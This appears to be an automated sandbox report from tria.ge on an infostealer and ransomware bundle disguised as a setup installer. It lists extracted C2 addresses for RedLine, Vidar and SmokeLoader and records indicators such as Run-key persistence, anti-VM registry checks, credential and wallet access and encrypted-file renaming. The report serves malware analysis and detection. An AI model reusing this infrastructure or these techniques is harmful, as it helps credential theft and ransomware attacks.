Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...0).exe
windows10_x64
setup_x86_...1).exe
windows10_x64
setup_x86_...2).exe
windows10_x64
10setup_x86_...3).exe
windows10_x64
10setup_x86_...4).exe
windows10_x64
setup_x86_...5).exe
windows10_x64
setup_x86_...6).exe
windows10_x64
setup_x86_...7).exe
windows10_x64
10setup_x86_...8).exe
windows10_x64
10setup_x86_...9).exe
windows10_x64
10setup_x86_...2).exe
windows10_x64
setup_x86_...0).exe
windows10_x64
10setup_x86_...1).exe
windows10_x64
setup_x86_...2).exe
windows10_x64
setup_x86_...3).exe
windows10_x64
10setup_x86_...3).exe
windows10_x64
setup_x86_...4).exe
windows10_x64
setup_x86_...5).exe
windows10_x64
setup_x86_...6).exe
windows10_x64
setup_x86_...7).exe
windows10_x64
setup_x86_...8).exe
windows10_x64
setup_x86_...9).exe
windows10_x64
setup_x86_...я.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
Resubmissions
11/07/2024, 05:43
240711-gej4lstgrf 1006/09/2021, 14:13
210906-rjpvrsedbm 1008/07/2021, 11:08
210708-4gztl3mwl6 1008/07/2021, 08:02
210708-klfb4qeda6 1007/07/2021, 09:39
210707-nem57xyvf2 1006/07/2021, 17:51
210706-7pcrmjy3fa 1006/07/2021, 13:45
210706-eybelwcq86 10Analysis
-
max time kernel
1801s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25/06/2021, 01:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install - копия (10).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
setup_x86_x64_install - копия (11).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
setup_x86_x64_install - копия (12).exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
setup_x86_x64_install - копия (13).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
setup_x86_x64_install - копия (14).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install - копия (15).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
setup_x86_x64_install - копия (16).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
setup_x86_x64_install - копия (17).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
setup_x86_x64_install - копия (18).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
setup_x86_x64_install - копия (19).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
setup_x86_x64_install - копия (2).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
setup_x86_x64_install - копия (20).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
setup_x86_x64_install - копия (21).exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
setup_x86_x64_install - копия (22).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
setup_x86_x64_install - копия (23).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
setup_x86_x64_install - копия (3).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
setup_x86_x64_install - копия (4).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
setup_x86_x64_install - копия (5).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
setup_x86_x64_install - копия (6).exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
setup_x86_x64_install - копия (7).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
setup_x86_x64_install - копия (8).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
setup_x86_x64_install - копия (9).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
setup_x86_x64_install - копия.exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
General
-
Target
setup_x86_x64_install - копия (20).exe
Malware Config
Extracted
C:\_readme.txt
https://we.tl/t-Z9xOWordyu
Extracted
redline
ServAni
87.251.71.195:82
Extracted
vidar
39.4
706
https://sergeevih43.tumblr.com
-
profile_id
706
Extracted
smokeloader
2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
vidar
39.4
932
https://sergeevih43.tumblr.com
-
profile_id
932
Extracted
vidar
39.4
865
https://sergeevih43.tumblr.com
-
profile_id
865
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral12/memory/2444-192-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral12/memory/2444-193-0x0000000000417F26-mapping.dmp family_redline behavioral12/memory/5648-341-0x0000000000417E22-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4104 created 3280 4104 WerFault.exe 328 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 1860 created 2728 1860 svchost.exe 140 PID 1860 created 4572 1860 svchost.exe 137 PID 1860 created 4836 1860 svchost.exe 263 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 6 IoCs
resource yara_rule behavioral12/memory/4032-303-0x0000000000B10000-0x0000000000BAD000-memory.dmp family_vidar behavioral12/memory/4032-305-0x0000000000400000-0x0000000000949000-memory.dmp family_vidar behavioral12/memory/4988-317-0x0000000002540000-0x00000000025DD000-memory.dmp family_vidar behavioral12/memory/4988-318-0x0000000000400000-0x0000000000949000-memory.dmp family_vidar behavioral12/memory/4316-329-0x00000000025A0000-0x000000000263D000-memory.dmp family_vidar behavioral12/memory/4316-330-0x0000000000400000-0x000000000094A000-memory.dmp family_vidar -
resource yara_rule behavioral12/files/0x000100000001ab84-118.dat aspack_v212_v242 behavioral12/files/0x000100000001ab7f-122.dat aspack_v212_v242 behavioral12/files/0x000100000001ab82-129.dat aspack_v212_v242 behavioral12/files/0x000100000001ab82-128.dat aspack_v212_v242 behavioral12/files/0x000100000001ab7f-123.dat aspack_v212_v242 behavioral12/files/0x000100000001ab80-120.dat aspack_v212_v242 behavioral12/files/0x000100000001ab84-119.dat aspack_v212_v242 behavioral12/files/0x000100000001ab80-121.dat aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts dqksjhàà(àç.exe -
Executes dropped EXE 64 IoCs
pid Process 2664 setup_installer.exe 4016 setup_install.exe 728 arnatic_2.exe 3388 arnatic_3.exe 4032 arnatic_1.exe 3500 arnatic_4.exe 1112 arnatic_5.exe 3940 arnatic_6.exe 3944 arnatic_7.exe 2724 jfiag3g_gg.exe 2444 arnatic_7.exe 4556 7006689.exe 4716 SppExtComObj.exe 4876 AJnVzDn5Yd7FO83Tk0TJdpGA.exe 4960 WinHoster.exe 4988 VJDpgX8XSvSeyBetT2C8kLfl.exe 5036 4704316.exe 2180 chrome.exe 4224 81SjQ8Y8_P7QY6tFe6NZs8vS.exe 756 1931028.exe 4316 5asy6n6oyspaENRUkZtA5Qzq.exe 3280 AJnVzDn5Yd7FO83Tk0TJdpGA.exe 2880 1e7R95rlQRS8XSN3FdabTAwe.exe 5532 kkfaipZZsCSio_SIEPN_fS7Q.exe 5648 kkfaipZZsCSio_SIEPN_fS7Q.exe 6072 6aHyyuXvRg2Nf7uXsT2DRK2_.exe 4572 xSLm9TxrFgsjNWJfMr70y5PL.exe 2728 lmADWHMCKuJKoLPUfWwB_mkn.exe 4788 SqCdxdUoq1RCWE_A0cLiPOjc.exe 4628 ae9v_KHZDBou_RKNbj1dJPjn.exe 5912 XM2GDOsP0pGcjrblTowiJBOv.exe 6008 1624584007826.exe 6048 jooyu.exe 6036 jingzhang.exe 6056 md8_8eus.exe 3260 jfiag3g_gg.exe 4564 jfiag3g_gg.exe 4712 83455048486.exe 2564 36196613693.exe 5868 83455048486.exe 696 frhhiwi 4304 fthhiwi 6008 1624584007826.exe 5620 lmADWHMCKuJKoLPUfWwB_mkn.exe 5016 xSLm9TxrFgsjNWJfMr70y5PL.exe 4748 fthhiwi 1816 jfiag3g_gg.exe 3856 jfiag3g_gg.exe 6120 1E8B.exe 4148 2AD0.exe 4068 383F.exe 800 4417.exe 6060 5A11.exe 1676 62FB.exe 3336 6F60.exe 4540 7BF4.exe 3756 fthhiwi 3848 frhhiwi 5948 334E.exe 4124 3999.exe 4836 69D2.exe 1752 872E.exe 5432 5A11.exe 4632 8F9B.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ResizeUndo.crw => C:\Users\Admin\Pictures\ResizeUndo.crw.ddsg 334E.exe File opened for modification C:\Users\Admin\Pictures\GrantSplit.tiff 334E.exe File renamed C:\Users\Admin\Pictures\GrantSplit.tiff => C:\Users\Admin\Pictures\GrantSplit.tiff.ddsg 334E.exe File renamed C:\Users\Admin\Pictures\MountSplit.tif => C:\Users\Admin\Pictures\MountSplit.tif.ddsg 334E.exe File renamed C:\Users\Admin\Pictures\OutRead.crw => C:\Users\Admin\Pictures\OutRead.crw.ddsg 334E.exe File opened for modification C:\Users\Admin\Pictures\RedoRemove.tiff 334E.exe File renamed C:\Users\Admin\Pictures\AssertSave.tif => C:\Users\Admin\Pictures\AssertSave.tif.ddsg 334E.exe File renamed C:\Users\Admin\Pictures\RedoRemove.tiff => C:\Users\Admin\Pictures\RedoRemove.tiff.ddsg 334E.exe File renamed C:\Users\Admin\Pictures\RepairResize.tif => C:\Users\Admin\Pictures\RepairResize.tif.ddsg 334E.exe File renamed C:\Users\Admin\Pictures\ResolveCheckpoint.png => C:\Users\Admin\Pictures\ResolveCheckpoint.png.ddsg 334E.exe -
resource yara_rule behavioral12/files/0x000100000001ab88-178.dat upx behavioral12/files/0x000100000001ab88-177.dat upx behavioral12/files/0x000200000001ab87-292.dat upx behavioral12/files/0x000200000001ab87-291.dat upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e7R95rlQRS8XSN3FdabTAwe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e7R95rlQRS8XSN3FdabTAwe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6aHyyuXvRg2Nf7uXsT2DRK2_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6aHyyuXvRg2Nf7uXsT2DRK2_.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation jingzhang.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Juxapivowae.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation arnatic_3.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation arnatic_6.exe -
Loads dropped DLL 40 IoCs
pid Process 4016 setup_install.exe 4016 setup_install.exe 4016 setup_install.exe 4016 setup_install.exe 4016 setup_install.exe 2136 rUNdlL32.eXe 728 arnatic_2.exe 3280 AJnVzDn5Yd7FO83Tk0TJdpGA.exe 4032 arnatic_1.exe 4988 VJDpgX8XSvSeyBetT2C8kLfl.exe 4032 arnatic_1.exe 4988 VJDpgX8XSvSeyBetT2C8kLfl.exe 4316 5asy6n6oyspaENRUkZtA5Qzq.exe 4316 5asy6n6oyspaENRUkZtA5Qzq.exe 5064 rUNdlL32.eXe 696 frhhiwi 4748 fthhiwi 4068 383F.exe 800 4417.exe 4068 383F.exe 4068 383F.exe 4068 383F.exe 4068 383F.exe 908 Process not Found 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4544 i-record.exe 4632 8F9B.exe 4632 8F9B.exe 4104 WerFault.exe 3848 frhhiwi 3236 fthhiwi 5940 frhhiwi 1072 fthhiwi 6132 hjhhiwi -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4176 icacls.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\\334E.exe\" --AutoStart" 334E.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ysrrkrwx = "\"C:\\Users\\Admin\\wxdmxthp.exe\"" 3999.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\Rotuhajaxo.exe\"" dqksjhàà(àç.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 872E.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1e7R95rlQRS8XSN3FdabTAwe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6aHyyuXvRg2Nf7uXsT2DRK2_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ipinfo.io 92 ipinfo.io 115 ipinfo.io 264 ipinfo.io 497 api.2ip.ua 521 api.2ip.ua 630 api.2ip.ua 122 ipinfo.io 265 ipinfo.io 358 api.ipify.org 520 api.2ip.ua 8 ip-api.com 93 ipinfo.io 496 api.2ip.ua 566 api.2ip.ua 725 api.2ip.ua 12 ipinfo.io 125 ipinfo.io -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent E365CD984DF08266 svchost.exe File opened for modification C:\Windows\System32\Tasks\Videocard Service svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 1933411855119362 svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent F2F50176AE3E417A svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4104 WerFault.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2880 1e7R95rlQRS8XSN3FdabTAwe.exe 6072 6aHyyuXvRg2Nf7uXsT2DRK2_.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 3100 set thread context of 592 3100 svchost.exe 94 PID 3944 set thread context of 2444 3944 arnatic_7.exe 85 PID 4876 set thread context of 3280 4876 AJnVzDn5Yd7FO83Tk0TJdpGA.exe 110 PID 5532 set thread context of 5648 5532 kkfaipZZsCSio_SIEPN_fS7Q.exe 119 PID 4712 set thread context of 5868 4712 83455048486.exe 219 PID 4304 set thread context of 4748 4304 fthhiwi 230 PID 5948 set thread context of 5968 5948 334E.exe 269 PID 676 set thread context of 2892 676 334E.exe 324 PID 3756 set thread context of 3236 3756 fthhiwi 346 PID 5368 set thread context of 6128 5368 334E.exe 349 PID 5480 set thread context of 1804 5480 334E.exe 368 PID 696 set thread context of 1072 696 fthhiwi 374 PID 1212 set thread context of 6528 1212 334E.exe 385 -
Drops file in Program Files directory 48 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\file4.exe XM2GDOsP0pGcjrblTowiJBOv.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\Windows Multimedia Platform\Rotuhajaxo.exe.config dqksjhàà(àç.exe File opened for modification C:\Program Files (x86)\recording\avdevice-53.dll irecord.tmp File created C:\Program Files (x86)\recording\is-4E906.tmp irecord.tmp File created C:\Program Files (x86)\Windows Multimedia Platform\Rotuhajaxo.exe dqksjhàà(àç.exe File opened for modification C:\Program Files (x86)\recording\swscale-2.dll irecord.tmp File created C:\Program Files (x86)\recording\is-TJB3B.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-B20J3.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-9DKE9.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe XM2GDOsP0pGcjrblTowiJBOv.exe File created C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe dqksjhàà(àç.exe File opened for modification C:\Program Files (x86)\recording\AForge.Video.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\Bunifu_UI_v1.52.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\postproc-52.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\swresample-0.dll irecord.tmp File created C:\Program Files (x86)\recording\is-A3TLB.tmp irecord.tmp File created C:\Program Files\Mozilla Firefox\DotNetZip-rqt2n1bo.tmp 81SjQ8Y8_P7QY6tFe6NZs8vS.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\recording\AForge.Video.FFMPEG.dll irecord.tmp File created C:\Program Files (x86)\recording\is-Q2736.tmp irecord.tmp File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak 81SjQ8Y8_P7QY6tFe6NZs8vS.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe.config dqksjhàà(àç.exe File opened for modification C:\Program Files (x86)\recording\avformat-53.dll irecord.tmp File created C:\Program Files (x86)\recording\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\recording\unins000.dat irecord.tmp File created C:\Program Files (x86)\recording\is-MQL66.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-L665A.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-U96IF.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-PC0EA.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe XM2GDOsP0pGcjrblTowiJBOv.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe XM2GDOsP0pGcjrblTowiJBOv.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini XM2GDOsP0pGcjrblTowiJBOv.exe File opened for modification C:\Program Files (x86)\recording\avcodec-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\avutil-51.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\unins000.exe irecord.tmp File created C:\Program Files (x86)\recording\is-6LE5Q.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-GU162.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-A9H2U.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jingzhang.exe XM2GDOsP0pGcjrblTowiJBOv.exe File opened for modification C:\Program Files (x86)\recording\i-record.exe irecord.tmp File opened for modification C:\Program Files (x86)\recording\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\recording\is-7G5KJ.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-KQQRI.tmp irecord.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 4840 4556 WerFault.exe 98 4104 3280 WerFault.exe 328 4088 1836 WerFault.exe 338 -
Checks SCSI registry key(s) 3 TTPs 30 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4417.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjhhiwi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hjhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AJnVzDn5Yd7FO83Tk0TJdpGA.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AJnVzDn5Yd7FO83Tk0TJdpGA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AJnVzDn5Yd7FO83Tk0TJdpGA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4417.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fthhiwi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4417.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frhhiwi -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 36196613693.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 36196613693.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8F9B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8F9B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VJDpgX8XSvSeyBetT2C8kLfl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 83455048486.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5asy6n6oyspaENRUkZtA5Qzq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 83455048486.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VJDpgX8XSvSeyBetT2C8kLfl.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 arnatic_1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString arnatic_1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5asy6n6oyspaENRUkZtA5Qzq.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5728 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 5576 timeout.exe 6008 timeout.exe 1376 timeout.exe 5988 timeout.exe 6000 timeout.exe 360 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 6 IoCs
pid Process 5820 taskkill.exe 5892 taskkill.exe 3936 taskkill.exe 6064 taskkill.exe 5468 taskkill.exe 4492 taskkill.exe -
